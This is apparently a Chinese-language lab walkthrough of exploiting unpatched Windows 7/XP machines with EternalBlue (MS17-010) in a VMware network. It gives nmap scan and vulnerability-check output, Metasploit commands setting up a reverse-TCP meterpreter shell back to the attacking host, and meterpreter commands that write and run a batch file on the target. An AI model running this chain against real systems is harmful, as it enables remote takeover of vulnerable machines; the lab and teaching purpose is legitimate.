老旧系统安全漏洞利用
实验环境
kali: 192.168.43.130
win64(winxp或win7未升级)
目标主机的环境检查
确定没有打补丁

确定开启了打印机功能

攻击主机
查询网关
ip route | grep default
|
default via 192.168.43.2 dev eth0 proto dhcp src 192.168.43.130 metric 100
|
扫描当前网段的设备的攻击目标
nmap -sS -sV -O -p 135,139,445,3389 192.168.43.0/24
|
Nmap scan report for 192.168.43.1
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp closed ms-wbt-server
MAC Address: 00:50:56:C0:00:08 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=5/4%OT=135%CT=3389%CU=31882%PV=Y%DS=1%DC=D%G=Y%M=00505
OS:6%TM=69F86221%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=I%CI=I%I
OS:I=I%SS=S%TS=A)SEQ(SP=102%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=1
OS:03%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=105%GCD=1%ISR=10B%TI=I%
OS:CI=I%II=I%SS=S%TS=A)SEQ(SP=106%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=A)OP
OS:S(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B4NW8ST11%O5=M5B4NW
OS:8ST11%O6=M5B4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)EC
OS:N(R=Y%DF=Y%T=80%W=FFFF%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80
OS:%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=
OS:)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%
OS:A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%
OS:DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=
OS:80%CD=Z)
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 192.168.43.2
Host is up (0.00015s latency).
PORT STATE SERVICE VERSION
135/tcp closed msrpc
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
3389/tcp closed ms-wbt-server
MAC Address: 00:50:56:EB:C8:82 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running: VMware Player
OS CPE: cpe:/a:vmware:player
OS details: VMware Player virtual NAT device
Network Distance: 1 hop
Nmap scan report for 192.168.43.131
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp filtered ms-wbt-server
MAC Address: 00:0C:29:A7:52:CA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|phone
Running: Microsoft Windows 7|Phone
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows
OS details: Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0
Network Distance: 1 hop
Service Info: Host: WIN-LIK03MO50OG; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 192.168.43.254
Host is up (0.00021s latency).
PORT STATE SERVICE VERSION
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
MAC Address: 00:50:56:E8:4D:85 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Nmap scan report for 192.168.43.130
Host is up (0.00010s latency).
PORT STATE SERVICE VERSION
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
3389/tcp filtered ms-wbt-server
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops
|
漏洞探测
nmap --script smb-vuln-ms17-010 -p 445 192.168.43.131
|
Nmap scan report for 192.168.43.131
Host is up (0.00048s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:A7:52:CA (VMware)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
|
启动攻击
使用 Metasploit
msfconsole
选择永恒之蓝攻击模块
use exploit/windows/smb/ms17_010_eternalblue
配置攻击信息并执行
set RHOSTS 192.168.43.131
set RPORT 445
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.43.130
set LPORT 4444
exploit

攻击命令
xecute -f cmd.exe -a "/c echo @echo off > C:\\atk.bat && echo echo 攻击成功!System Pwned! ^> \"C:\\攻击成功.txt\" >> C:\\atk.bat" -H
execute -f cmd.exe -a "/c C:\\atk.bat" -H
攻击结果

结果验证


浙公网安备 33010602011771号